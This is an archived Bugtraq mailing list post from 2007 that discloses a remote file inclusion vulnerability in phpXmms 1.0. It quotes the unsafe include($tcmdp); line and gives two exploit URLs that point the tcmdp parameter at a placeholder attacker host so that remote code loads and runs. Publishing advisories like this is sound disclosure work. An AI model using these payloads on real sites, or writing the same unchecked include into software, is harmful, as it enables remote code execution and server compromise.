Bugtraq mailing list archives

phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities

From: ilkerkandemir () mynet com
Date: 20 Feb 2007 08:19:49 -0000

-------------------------------------------------------------------------------------------------------------------

AYYILDIZ.ORG PreSents...


Script: phpXmms 1.0
Script Download: ftp://ftp.warpedsystems.sk.ca/pub/php/phpxmms-1.0.tar.gz

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
include($tcmdp);

-------------------------------------------------------------------------------------------------------------------

Exploit:  phpxmmsb.php?tcmdp=http://attacker.txt?
             phpxmmst.php?tcmdp=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Asianeagle,ajann,Str0ke .
Special Tnx: AYYILDIZ.ORG

Current thread:

phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities ilkerkandemir (Feb 20)